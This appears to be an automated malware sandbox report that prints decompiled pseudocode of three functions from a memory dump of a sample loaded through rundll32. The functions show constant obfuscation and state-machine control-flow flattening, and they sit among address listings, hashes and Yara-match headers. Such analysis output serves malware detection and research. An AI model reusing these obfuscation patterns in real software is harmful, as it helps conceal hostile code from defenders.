                                                                                                                                    0x002da657
                                                                                                                                    0x002da659
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002da576
                                                                                                                                    0x002da576
                                                                                                                                    0x002da57a
                                                                                                                                    0x002da57c
                                                                                                                                    0x002da5df
                                                                                                                                    0x002da5df
                                                                                                                                    0x002da5e3
                                                                                                                                    0x002da5e3
                                                                                                                                    0x002da5e7
                                                                                                                                    0x00000000
                                                                                                                                    0x002da57e
                                                                                                                                    0x002da582
                                                                                                                                    0x002da58f
                                                                                                                                    0x002da590
                                                                                                                                    0x002da591
                                                                                                                                    0x002da595
                                                                                                                                    0x002da59a
                                                                                                                                    0x002da5a2
                                                                                                                                    0x00000000
                                                                                                                                    0x002da5a8
                                                                                                                                    0x002da5b4
                                                                                                                                    0x002da5c2
                                                                                                                                    0x002da5c7
                                                                                                                                    0x002da5cb
                                                                                                                                    0x002da5cd
                                                                                                                                    0x002da5d0
                                                                                                                                    0x002da5d3
                                                                                                                                    0x002da5d7
                                                                                                                                    0x002da5dd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002da5dd
                                                                                                                                    0x002da5a2
                                                                                                                                    0x002da57c
                                                                                                                                    0x002da570
                                                                                                                                    0x002da52d
                                                                                                                                    0x002da533
                                                                                                                                    0x00000000
                                                                                                                                    0x002da539
                                                                                                                                    0x002da539
                                                                                                                                    0x00000000
                                                                                                                                    0x002da539
                                                                                                                                    0x002da533
                                                                                                                                    0x002da65d
                                                                                                                                    0x002da665
                                                                                                                                    0x002da665
                                                                                                                                    0x002da5f5
                                                                                                                                    0x002da604
                                                                                                                                    0x002da605
                                                                                                                                    0x002da606
                                                                                                                                    0x002da60b
                                                                                                                                    0x002da611
                                                                                                                                    0x002da61b
                                                                                                                                    0x002da61f
                                                                                                                                    0x00000000
                                                                                                                                    0x002da613
                                                                                                                                    0x002da613
                                                                                                                                    0x002da617
                                                                                                                                    0x00000000
                                                                                                                                    0x002da617
                                                                                                                                    0x00000000
                                                                                                                                    0x002da624
                                                                                                                                    0x002da624
                                                                                                                                    0x002da628
                                                                                                                                    0x002da634
                                                                                                                                    0x00000000
                                                                                                                                    0x002da634

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !J$YIa$mU$s
                                                                                                                                    • API String ID: 0-3335770892
                                                                                                                                    • Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                                    • Instruction ID: 2228eeb8b4a18513f98cf01e3d6cb9dc0d8863b7204a16570b49b4143d80e264
                                                                                                                                    • Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                                    • Instruction Fuzzy Hash: 79914EB19193819BC354CF29D18580BFBF0BBC5B58F548A1EF99597260D3B4DA188F83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C4EE3 Relevance: 5.2, Strings: 4, Instructions: 168COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002C4EE3(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				void* _t203;
				void* _t204;
				void* _t207;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				void* _t221;

				_v84 = _v84 & 0x00000000;
				_v88 = 0xf9097a;
				_v32 = 0xbcbe1d;
				_v32 = _v32 << 9;
				_v32 = _v32 << 9;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0xa0062323;
				_v16 = 0x782140;
				_v16 = _v16 + 0xfffffe34;
				_v16 = _v16 + 0xfffffe18;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0xe0701d9a;
				_v40 = 0x7af846;
				_v40 = _v40 + 0xffff28b3;
				_v40 = _v40 << 0xd;
				_v40 = _v40 + 0xffffd351;
				_v40 = _v40 ^ 0x441384bc;
				_v68 = 0xebfd4;
				_v68 = _v68 + 0xffff2b98;
				_t212 = 0x4b;
				_v68 = _v68 / _t212;
				_v68 = _v68 ^ 0x000f3184;
				_v48 = 0x77c678;
				_t213 = 0x72;
				_v48 = _v48 * 0x4d;
				_v48 = _v48 + 0x6b8c;
				_v48 = _v48 ^ 0x240efbe4;
				_v24 = 0xae1064;
				_v24 = _v24 / _t213;
				_v24 = _v24 << 7;
				_v24 = _v24 ^ 0x1be7fa9d;
				_v24 = _v24 ^ 0x1b226397;
				_v72 = 0x44bde7;
				_v72 = _v72 | 0x5f63ee23;
				_v72 = _v72 ^ 0x5f6de837;
				_v56 = 0x5a94a4;
				_v56 = _v56 >> 9;
				_t214 = 0xc;
				_v56 = _v56 * 0x2a;
				_v56 = _v56 ^ 0x0003dc1b;
				_v8 = 0x2a4d30;
				_v8 = _v8 + 0xff2b;
				_v8 = _v8 | 0x9a82811b;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0xbcdbc31f;
				_v64 = 0xa41a91;
				_v64 = _v64 | 0x62aa1889;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xc357e7aa;
				_v36 = 0x90fe9;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x57d87c49;
				_v36 = _v36 / _t214;
				_v36 = _v36 ^ 0x0755636a;
				_v28 = 0x5fda7e;
				_v28 = _v28 + 0xffff2d0f;
				_v28 = _v28 << 0xa;
				_v28 = _v28 + 0xdffb;
				_v28 = _v28 ^ 0x7c1a8a5e;
				_v20 = 0xaf632f;
				_v20 = _v20 >> 8;
				_v20 = _v20 << 9;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x0003fa93;
				_v12 = 0x960758;
				_v12 = _v12 ^ 0x64ee01f0;
				_v12 = _v12 | 0x3d3dd2ba;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xbeed48c5;
				_v80 = 0xba0fdf;
				_v80 = _v80 + 0xfd2d;
				_v80 = _v80 ^ 0x00b93168;
				_v60 = 0x5f834c;
				_v60 = _v60 ^ 0x963b7b6a;
				_t215 = 0x3f;
				_v60 = _v60 * 0x3e;
				_v60 = _v60 ^ 0x6c73d449;
				_v76 = 0x4b89c6;
				_v76 = _v76 >> 6;
				_v76 = _v76 ^ 0x0008f57a;
				_v52 = 0x3d488e;
				_v52 = _v52 << 6;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x5226582a;
				_v44 = 0x8cf369;
				_v44 = _v44 ^ 0x25329c0c;
				_v44 = _v44 / _t215;
				_v44 = _v44 >> 0xe;
				_v44 = _v44 ^ 0x0005c7da;
				_t216 =  *0x2e3e10; // 0x0
				_t203 = E002CB6CF(_t216 + 0x1c, _v32, _v16, _v40);
				_t241 = _a4 + 0x2c;
				_t204 = E002CB23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
				_t248 = _t204;
				if(_t204 != 0) {
					_push(_v64);
					_push(_v8);
					_t207 = E002DDCF7(_v56, 0x2c1000, _t248);
					_pop(_t221);
					E002C47CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
					E002CA8B0(_v60, _t207, _v76);
					E002D1F8A(_v52, _v44,  &_v608);
				}
				return 1;
			}


































                                                                                                                                    0x002c4eec
                                                                                                                                    0x002c4ef2
                                                                                                                                    0x002c4ef9
                                                                                                                                    0x002c4f00
                                                                                                                                    0x002c4f04
                                                                                                                                    0x002c4f08
                                                                                                                                    0x002c4f0c
                                                                                                                                    0x002c4f13
                                                                                                                                    0x002c4f1a
                                                                                                                                    0x002c4f21
                                                                                                                                    0x002c4f28
                                                                                                                                    0x002c4f2c
                                                                                                                                    0x002c4f33
                                                                                                                                    0x002c4f3a
                                                                                                                                    0x002c4f41
                                                                                                                                    0x002c4f45
                                                                                                                                    0x002c4f4c
                                                                                                                                    0x002c4f53
                                                                                                                                    0x002c4f5a
                                                                                                                                    0x002c4f67
                                                                                                                                    0x002c4f6c
                                                                                                                                    0x002c4f71
                                                                                                                                    0x002c4f78
                                                                                                                                    0x002c4f83
                                                                                                                                    0x002c4f86
                                                                                                                                    0x002c4f89
                                                                                                                                    0x002c4f90
                                                                                                                                    0x002c4f97
                                                                                                                                    0x002c4fa5
                                                                                                                                    0x002c4fa8
                                                                                                                                    0x002c4fac
                                                                                                                                    0x002c4fb3
                                                                                                                                    0x002c4fba
                                                                                                                                    0x002c4fc1
                                                                                                                                    0x002c4fc8
                                                                                                                                    0x002c4fcf
                                                                                                                                    0x002c4fd6
                                                                                                                                    0x002c4fde
                                                                                                                                    0x002c4fdf
                                                                                                                                    0x002c4fe2
                                                                                                                                    0x002c4fe9
                                                                                                                                    0x002c4ff0
                                                                                                                                    0x002c4ff7
                                                                                                                                    0x002c4ffe
                                                                                                                                    0x002c5002
                                                                                                                                    0x002c5009
                                                                                                                                    0x002c5010
                                                                                                                                    0x002c5017
                                                                                                                                    0x002c501b
                                                                                                                                    0x002c5022
                                                                                                                                    0x002c5029
                                                                                                                                    0x002c502d
                                                                                                                                    0x002c5039
                                                                                                                                    0x002c503c
                                                                                                                                    0x002c5043
                                                                                                                                    0x002c504a
                                                                                                                                    0x002c5051
                                                                                                                                    0x002c5055
                                                                                                                                    0x002c505c
                                                                                                                                    0x002c5063
                                                                                                                                    0x002c506a
                                                                                                                                    0x002c506e
                                                                                                                                    0x002c5072
                                                                                                                                    0x002c5076
                                                                                                                                    0x002c507d
                                                                                                                                    0x002c5084
                                                                                                                                    0x002c508b
                                                                                                                                    0x002c5094
                                                                                                                                    0x002c5098
                                                                                                                                    0x002c509f
                                                                                                                                    0x002c50a6
                                                                                                                                    0x002c50ad
                                                                                                                                    0x002c50b4
                                                                                                                                    0x002c50bb
                                                                                                                                    0x002c50c8
                                                                                                                                    0x002c50c9
                                                                                                                                    0x002c50cc
                                                                                                                                    0x002c50d3
                                                                                                                                    0x002c50da
                                                                                                                                    0x002c50de
                                                                                                                                    0x002c50e5
                                                                                                                                    0x002c50ec
                                                                                                                                    0x002c50f0
                                                                                                                                    0x002c50f4
                                                                                                                                    0x002c50fb
                                                                                                                                    0x002c5102
                                                                                                                                    0x002c510e
                                                                                                                                    0x002c5111
                                                                                                                                    0x002c5115
                                                                                                                                    0x002c5122
                                                                                                                                    0x002c512e
                                                                                                                                    0x002c513a
                                                                                                                                    0x002c5147
                                                                                                                                    0x002c514f
                                                                                                                                    0x002c5151
                                                                                                                                    0x002c5154
                                                                                                                                    0x002c515c
                                                                                                                                    0x002c5162
                                                                                                                                    0x002c516d
                                                                                                                                    0x002c5189
                                                                                                                                    0x002c5196
                                                                                                                                    0x002c51a8
                                                                                                                                    0x002c51b0
                                                                                                                                    0x002c51b8

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                    • String ID: *X&R$0M*$7m_$@!x
                                                                                                                                    • API String ID: 1586166983-4050865940
                                                                                                                                    • Opcode ID: 699d9be608e25a5824adeeeb4e5b82ea178424b62761b0b15403d355b39969bd
                                                                                                                                    • Instruction ID: a5ad7f5ddcdd070f514813fb596486a7abdfeb25934b05bfd11d30dcf6da7ca2
                                                                                                                                    • Opcode Fuzzy Hash: 699d9be608e25a5824adeeeb4e5b82ea178424b62761b0b15403d355b39969bd
                                                                                                                                    • Instruction Fuzzy Hash: 7D811272C0121DAFCF49DFA1D88A9EEBBB1FB44318F208118E411B6260D7B45A5ACF94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CEA99 Relevance: 5.2, Strings: 4, Instructions: 153COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E002CEA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t136;
				signed int _t147;
				void* _t150;
				intOrPtr* _t152;
				void* _t154;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int* _t171;

				_push(_a16);
				_t152 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t136);
				_v52 = 0x4b44d9;
				_t171 =  &(( &_v68)[6]);
				_t165 = 0;
				_t154 = 0x40ad1f2;
				_t166 = 0x41;
				_v52 = _v52 * 0x5c;
				_v52 = _v52 ^ 0xd486af61;
				_v52 = _v52 ^ 0xcf8a129f;
				_v24 = 0x8b17cc;
				_v24 = _v24 + 0xffff02b5;
				_v24 = _v24 ^ 0x008a1a91;
				_v64 = 0xcc4e1;
				_v64 = _v64 ^ 0x71537a57;
				_v64 = _v64 | 0xbc84d226;
				_v64 = _v64 + 0x8a58;
				_v64 = _v64 ^ 0xbde0890e;
				_v12 = 0x10173e;
				_v12 = _v12 / _t166;
				_v12 = _v12 ^ 0x000bb2e7;
				_v16 = 0xcbf18d;
				_v16 = _v16 + 0x7f8c;
				_v16 = _v16 ^ 0x00cd0dea;
				_v20 = 0x7a67ce;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00fa626e;
				_v68 = 0x7779f8;
				_v68 = _v68 + 0xa85e;
				_v68 = _v68 << 0x10;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x0443aeb4;
				_v28 = 0xee6391;
				_v28 = _v28 ^ 0x2bfa2339;
				_v28 = _v28 ^ 0x2b1bacd2;
				_v32 = 0x87b642;
				_v32 = _v32 + 0xffff3baa;
				_v32 = _v32 ^ 0x008fda80;
				_v36 = 0x3b697f;
				_v36 = _v36 | 0x5675f49c;
				_v36 = _v36 ^ 0x5679bffa;
				_v40 = 0x254a84;
				_v40 = _v40 * 0x67;
				_v40 = _v40 ^ 0x0f0bd396;
				_v44 = 0xfc206d;
				_v44 = _v44 * 0x45;
				_v44 = _v44 ^ 0x43f6aa11;
				_v56 = 0x3dd941;
				_v56 = _v56 ^ 0x94d2d45c;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x00419011;
				_v4 = 0xdcf5c3;
				_v4 = _v4 ^ 0x0d464ae6;
				_v4 = _v4 ^ 0x0d938ce3;
				_v60 = 0xe23f0;
				_v60 = _v60 ^ 0x0435e191;
				_v60 = _v60 ^ 0xbde67646;
				_v60 = _v60 ^ 0xb922f804;
				_v60 = _v60 ^ 0x00f2260b;
				_v8 = 0x523a90;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x259e6962;
				_v48 = 0x46565e;
				_t167 = 3;
				_v48 = _v48 * 0x6a;
				_t168 = _v4;
				_v48 = _v48 / _t167;
				_v48 = _v48 ^ 0x09b4f31e;
				do {
					while(_t154 != 0x40ad1f2) {
						if(_t154 == 0x458d12f) {
							_t147 = E002C8F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
							_t168 = _t147;
							_t171 =  &(_t171[0xa]);
							if(_t147 != 0xffffffff) {
								_t154 = 0x4af2a99;
								continue;
							}
						} else {
							if(_t154 == 0x4af2a99) {
								_t150 = E002C19B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
								_t171 =  &(_t171[8]);
								_t165 = _t150;
								_t154 = 0xe5b5021;
								continue;
							} else {
								if(_t154 != 0xe5b5021) {
									goto L11;
								} else {
									E002D1E67(_v4, _v60, _v8, _v48, _t168);
								}
							}
						}
						L6:
						return _t165;
					}
					_t154 = 0x458d12f;
					L11:
				} while (_t154 != 0xd2f352d);
				goto L6;
			}





























                                                                                                                                    0x002ceaa0
                                                                                                                                    0x002ceaa4
                                                                                                                                    0x002ceaa6
                                                                                                                                    0x002ceaaa
                                                                                                                                    0x002ceaae
                                                                                                                                    0x002ceab2
                                                                                                                                    0x002ceab3
                                                                                                                                    0x002ceab4
                                                                                                                                    0x002ceab9
                                                                                                                                    0x002ceac1
                                                                                                                                    0x002ceacb
                                                                                                                                    0x002ceacd
                                                                                                                                    0x002cead4
                                                                                                                                    0x002cead5
                                                                                                                                    0x002cead9
                                                                                                                                    0x002ceae1
                                                                                                                                    0x002ceae9
                                                                                                                                    0x002ceaf1
                                                                                                                                    0x002ceaf9
                                                                                                                                    0x002ceb01
                                                                                                                                    0x002ceb09
                                                                                                                                    0x002ceb11
                                                                                                                                    0x002ceb19
                                                                                                                                    0x002ceb21
                                                                                                                                    0x002ceb29
                                                                                                                                    0x002ceb37
                                                                                                                                    0x002ceb3b
                                                                                                                                    0x002ceb43
                                                                                                                                    0x002ceb4b
                                                                                                                                    0x002ceb53
                                                                                                                                    0x002ceb5b
                                                                                                                                    0x002ceb63
                                                                                                                                    0x002ceb67
                                                                                                                                    0x002ceb6f
                                                                                                                                    0x002ceb77
                                                                                                                                    0x002ceb7f
                                                                                                                                    0x002ceb84
                                                                                                                                    0x002ceb89
                                                                                                                                    0x002ceb91
                                                                                                                                    0x002ceb99
                                                                                                                                    0x002ceba1
                                                                                                                                    0x002ceba9
                                                                                                                                    0x002cebb1
                                                                                                                                    0x002cebb9
                                                                                                                                    0x002cebc1
                                                                                                                                    0x002cebc9
                                                                                                                                    0x002cebd1
                                                                                                                                    0x002cebd9
                                                                                                                                    0x002cebe6
                                                                                                                                    0x002cebea
                                                                                                                                    0x002cebf2
                                                                                                                                    0x002cebff
                                                                                                                                    0x002cec03
                                                                                                                                    0x002cec0b
                                                                                                                                    0x002cec13
                                                                                                                                    0x002cec1b
                                                                                                                                    0x002cec20
                                                                                                                                    0x002cec28
                                                                                                                                    0x002cec30
                                                                                                                                    0x002cec38
                                                                                                                                    0x002cec40
                                                                                                                                    0x002cec48
                                                                                                                                    0x002cec50
                                                                                                                                    0x002cec58
                                                                                                                                    0x002cec60
                                                                                                                                    0x002cec68
                                                                                                                                    0x002cec75
                                                                                                                                    0x002cec79
                                                                                                                                    0x002cec81
                                                                                                                                    0x002cec92
                                                                                                                                    0x002cec98
                                                                                                                                    0x002ceca2
                                                                                                                                    0x002ceca6
                                                                                                                                    0x002cecaa
                                                                                                                                    0x002cecb2
                                                                                                                                    0x002cecb2
                                                                                                                                    0x002cecc0
                                                                                                                                    0x002ced52
                                                                                                                                    0x002ced57
                                                                                                                                    0x002ced59
                                                                                                                                    0x002ced5f
                                                                                                                                    0x002ced61
                                                                                                                                    0x00000000
                                                                                                                                    0x002ced61
                                                                                                                                    0x002cecc2
                                                                                                                                    0x002cecc8
                                                                                                                                    0x002ced16
                                                                                                                                    0x002ced1b
                                                                                                                                    0x002ced1e
                                                                                                                                    0x002ced20
                                                                                                                                    0x00000000
                                                                                                                                    0x002cecca
                                                                                                                                    0x002cecd0
                                                                                                                                    0x00000000
                                                                                                                                    0x002cecd6
                                                                                                                                    0x002cece7
                                                                                                                                    0x002cecec
                                                                                                                                    0x002cecd0
                                                                                                                                    0x002cecc8
                                                                                                                                    0x002cecef
                                                                                                                                    0x002cecf8
                                                                                                                                    0x002cecf8
                                                                                                                                    0x002ced6b
                                                                                                                                    0x002ced6d
                                                                                                                                    0x002ced6d
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: -5/$WzSq$^VF$JF
                                                                                                                                    • API String ID: 0-2399144359
                                                                                                                                    • Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                                    • Instruction ID: 05d5c2d4ed33cc8180f91bceba080de7ae86e4c9701e0d4110b4d6b886b203f6
                                                                                                                                    • Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                                    • Instruction Fuzzy Hash: CD7132710183419BCB58CF65C98691BBBF2FBC8758F104A1DF29696220C3B1DA58CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002D9BCF Relevance: 5.1, Strings: 4, Instructions: 133COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E002D9BCF() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				unsigned int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t111;
				signed int _t115;
				signed int _t117;
				void* _t118;
				signed int _t132;
				void* _t134;
				signed int _t135;
				signed int* _t136;

				_t136 =  &_v568;
				_v560 = 0x297e3c;
				_v560 = _v560 >> 9;
				_t118 = 0x4ead2fe;
				_v560 = _v560 + 0xe8be;
				_v560 = _v560 ^ 0xc9c09221;
				_v560 = _v560 ^ 0xc9c20db8;
				_v540 = 0x190e1d;
				_v540 = _v540 >> 7;
				_v540 = _v540 >> 0xd;
				_v540 = _v540 ^ 0x000cdd3b;
				_v544 = 0x86c2f0;
				_v544 = _v544 | 0x0d7eac20;
				_v544 = _v544 ^ 0xe6b61282;
				_v544 = _v544 ^ 0xeb41e563;
				_v552 = 0x262f60;
				_v552 = _v552 ^ 0x76c91adc;
				_v552 = _v552 + 0xd1c5;
				_v552 = _v552 ^ 0x76fc323e;
				_v524 = 0xf427e0;
				_v524 = _v524 + 0xffff22a3;
				_v524 = _v524 ^ 0x00f85f52;
				_v548 = 0xdbc1a5;
				_v548 = _v548 >> 0xb;
				_v548 = _v548 + 0xf615;
				_v548 = _v548 ^ 0x0006ff3e;
				_v556 = 0xd2f840;
				_v556 = _v556 * 0x5f;
				_t134 = 0;
				_v556 = _v556 ^ 0x4e4cccaa;
				_v568 = 0x74ecfa;
				_t132 = 0x53;
				_t133 = _v556;
				_v568 = _v568 / _t132;
				_v568 = _v568 ^ 0xc72664ff;
				_v568 = _v568 << 0xf;
				_v568 = _v568 ^ 0x862d9f40;
				_v536 = 0xc0d44a;
				_v536 = _v536 + 0x396d;
				_t135 = _v556;
				_t117 = _v556;
				_v536 = _v536 * 0x46;
				_v536 = _v536 ^ 0x34c6c601;
				_v532 = 0xf37e83;
				_v532 = _v532 << 8;
				_v532 = _v532 | 0x760e0a19;
				_v532 = _v532 ^ 0xf77c332a;
				_v528 = 0x91f8e3;
				_v528 = _v528 ^ 0xc904aca2;
				_v528 = _v528 ^ 0xc9900919;
				do {
					while(_t118 != 0x27fe330) {
						if(_t118 == 0x4ead2fe) {
							_t118 = 0x96d401d;
							continue;
						} else {
							if(_t118 == 0x7ac597b) {
								_t117 = E002CB6CF( &_v520, _v548, _v556, _v568);
								_t118 = 0xa7595e6;
								continue;
							} else {
								if(_t118 == 0x80b0e4e) {
									_t90 =  &_v552; // 0xeb41e563
									_t111 = E002C9B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
									_t136 =  &(_t136[4]);
									__eflags = _t111;
									if(__eflags != 0) {
										_t118 = 0x7ac597b;
										continue;
									}
								} else {
									if(_t118 == 0x96d401d) {
										_t115 = E002C52C2();
										_t133 = _t115;
										__eflags = _t115;
										if(__eflags != 0) {
											_t118 = 0x80b0e4e;
											continue;
										}
									} else {
										if(_t118 != 0xa7595e6) {
											goto L15;
										} else {
											_t135 = E002C2051(_v532, _t117, _v528);
											_t118 = 0x27fe330;
											continue;
										}
									}
								}
							}
						}
						goto L16;
					}
					_v564 = 0x69bdc3;
					_v564 = _v564 | 0xfd1bce6c;
					_v564 = _v564 ^ 0xf153ffb6;
					_v564 = _v564 ^ 0x260f00bb;
					__eflags = _t135 - _v564;
					_t134 =  ==  ? 1 : _t134;
					_t118 = 0x8b668cc;
					L15:
					__eflags = _t118 - 0x8b668cc;
				} while (__eflags != 0);
				L16:
				return _t134;
			}
























                                                                                                                                    0x002d9bcf
                                                                                                                                    0x002d9bd9
                                                                                                                                    0x002d9be3
                                                                                                                                    0x002d9be8
                                                                                                                                    0x002d9bed
                                                                                                                                    0x002d9bf5
                                                                                                                                    0x002d9bfd
                                                                                                                                    0x002d9c05
                                                                                                                                    0x002d9c0d
                                                                                                                                    0x002d9c12
                                                                                                                                    0x002d9c17
                                                                                                                                    0x002d9c1f
                                                                                                                                    0x002d9c27
                                                                                                                                    0x002d9c2f
                                                                                                                                    0x002d9c37
                                                                                                                                    0x002d9c3f
                                                                                                                                    0x002d9c47
                                                                                                                                    0x002d9c4f
                                                                                                                                    0x002d9c57
                                                                                                                                    0x002d9c5f
                                                                                                                                    0x002d9c67
                                                                                                                                    0x002d9c6f
                                                                                                                                    0x002d9c77
                                                                                                                                    0x002d9c7f
                                                                                                                                    0x002d9c84
                                                                                                                                    0x002d9c8c
                                                                                                                                    0x002d9c94
                                                                                                                                    0x002d9ca1
                                                                                                                                    0x002d9ca5
                                                                                                                                    0x002d9ca7
                                                                                                                                    0x002d9caf
                                                                                                                                    0x002d9cbd
                                                                                                                                    0x002d9cc0
                                                                                                                                    0x002d9cc4
                                                                                                                                    0x002d9cc8
                                                                                                                                    0x002d9cd0
                                                                                                                                    0x002d9cd5
                                                                                                                                    0x002d9cdd
                                                                                                                                    0x002d9ce5
                                                                                                                                    0x002d9cf2
                                                                                                                                    0x002d9cf6
                                                                                                                                    0x002d9cfa
                                                                                                                                    0x002d9cfe
                                                                                                                                    0x002d9d06
                                                                                                                                    0x002d9d0e
                                                                                                                                    0x002d9d13
                                                                                                                                    0x002d9d1b
                                                                                                                                    0x002d9d23
                                                                                                                                    0x002d9d2b
                                                                                                                                    0x002d9d33
                                                                                                                                    0x002d9d3b
                                                                                                                                    0x002d9d3b
                                                                                                                                    0x002d9d4d
                                                                                                                                    0x002d9e02
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9d53
                                                                                                                                    0x002d9d59
                                                                                                                                    0x002d9df6
                                                                                                                                    0x002d9df8
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9d5f
                                                                                                                                    0x002d9d65
                                                                                                                                    0x002d9dc1
                                                                                                                                    0x002d9dc9
                                                                                                                                    0x002d9dce
                                                                                                                                    0x002d9dd1
                                                                                                                                    0x002d9dd3
                                                                                                                                    0x002d9dd5
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9dd5
                                                                                                                                    0x002d9d67
                                                                                                                                    0x002d9d6d
                                                                                                                                    0x002d9da0
                                                                                                                                    0x002d9da5
                                                                                                                                    0x002d9da7
                                                                                                                                    0x002d9da9
                                                                                                                                    0x002d9daf
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9daf
                                                                                                                                    0x002d9d6f
                                                                                                                                    0x002d9d75
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9d7b
                                                                                                                                    0x002d9d8f
                                                                                                                                    0x002d9d91
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9d91
                                                                                                                                    0x002d9d75
                                                                                                                                    0x002d9d6d
                                                                                                                                    0x002d9d65
                                                                                                                                    0x002d9d59
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9d4d
                                                                                                                                    0x002d9e0c
                                                                                                                                    0x002d9e16
                                                                                                                                    0x002d9e1f
                                                                                                                                    0x002d9e27
                                                                                                                                    0x002d9e33
                                                                                                                                    0x002d9e35
                                                                                                                                    0x002d9e38
                                                                                                                                    0x002d9e3d
                                                                                                                                    0x002d9e3d
